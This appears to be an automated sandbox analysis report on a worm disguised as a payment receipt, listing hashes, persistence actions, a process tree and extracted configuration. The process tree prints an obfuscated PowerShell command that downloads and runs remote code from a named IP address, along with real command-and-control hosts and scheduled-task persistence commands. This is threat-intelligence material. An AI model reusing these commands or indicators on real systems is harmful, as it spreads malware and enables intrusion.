Analysis
-
max time kernel
118s -
max time network
150s -
platform
windows7_x64 -
resource
win7-en-20210920 -
submitted
28-10-2021 15:41
Static task
static1
Behavioral task
behavioral1
Sample
d2h8_Payment_receipt.js
Resource
win7-en-20210920
General
-
Target
d2h8_Payment_receipt.js
-
Size
81KB
-
MD5
b28995f906c68033265eddd4465f25aa
-
SHA1
e96cd013b328a7740b2a73c3da0efe92d479f491
-
SHA256
1462ec0ee24166bb000751db97514da4e7bd875fb960499ceefaa2142ec34649
-
SHA512
395cde1555290656f88c35bea231b90336c8918685fbf9d6f9223c0c96f2cdfd984f8e085f669ce34d9e8318b275aecebe55ef614db3b8edbefa917007d9b62d
Malware Config
Extracted
http://13.78.209.105/E/err.txt
Extracted
vjw0rm
http://6200js.duckdns.org:6200
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
wscript.exeflow pid process 5 368 wscript.exe -
Drops startup file 2 IoCs
Processes:
wscript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d2h8_Payment_receipt.js wscript.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d2h8_Payment_receipt.js wscript.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
wscript.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run wscript.exe Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\BB4HJP0E1C = "'C:\\Users\\Admin\\AppData\\Local\\Temp\\d2h8_Payment_receipt.js'" wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1988 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
wscript.exeWScript.exedescription pid process target process PID 368 wrote to memory of 376 368 wscript.exe schtasks.exe PID 368 wrote to memory of 376 368 wscript.exe schtasks.exe PID 368 wrote to memory of 376 368 wscript.exe schtasks.exe PID 368 wrote to memory of 872 368 wscript.exe WScript.exe PID 368 wrote to memory of 872 368 wscript.exe WScript.exe PID 368 wrote to memory of 872 368 wscript.exe WScript.exe PID 872 wrote to memory of 1988 872 WScript.exe powershell.exe PID 872 wrote to memory of 1988 872 WScript.exe powershell.exe PID 872 wrote to memory of 1988 872 WScript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\d2h8_Payment_receipt.js1⤵
- Blocklisted process makes network request
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr 'C:\Users\Admin\AppData\Local\Temp\d2h8_Payment_receipt.js2⤵
- Creates scheduled task(s)
PID:376
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\07AMQQVOE5.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:872 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $H ='http://13.78.209.105/E/err.txt';$H1 = '******************^^^^^^^^^^^^^^^^^^``````````````'.Replace('******************','n').Replace('^^^^^^^^^^^^^^^^^^','E').Replace('``````````````','t');$H2 ='DDDDDDDDEEEEEEEEEEE'.Replace('DDDDDDDD','.').Replace('EEEEEEEEEE','W');$H4 ='NNNNNNNNNNNNNNNNTTTTTTTTTTNT'.Replace('NNNNNNNNNNNNNNNNTTTTTTTTTT','IE');$H3 ='LLLLLLLLLL'.Replace('LLLLLLLLL','bC');$HH =$H1+$H2+$H3+$H4;$HHH ='DO---------------nG'.Replace('---------------','WnLoaDSTrI');$HHHH ='I`---------------Ec++++++++++++++H).$HHH($H)'.Replace('`---------------','EX(ne`W`-Obj`').Replace('++++++++++++++','`T $H');&('I'+'EX')($HHHH -Join '')|&('I'+'EX');3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
2b137d3d2ea7ddba63e99586f44e0388
SHA1d4634061943a78624880537ffa65472fc6195474
SHA2561af97b7b7febcf25481d8c653b141681be8a1cad29a563e9057c02c1c87b75c2
SHA5126a7240273576e625066b114960fa4063acd9404727d02bcd3183248f5c820161ec15fafe01858d22ddcf39cd4d03f8e52988625aabd7b01565339b8927693115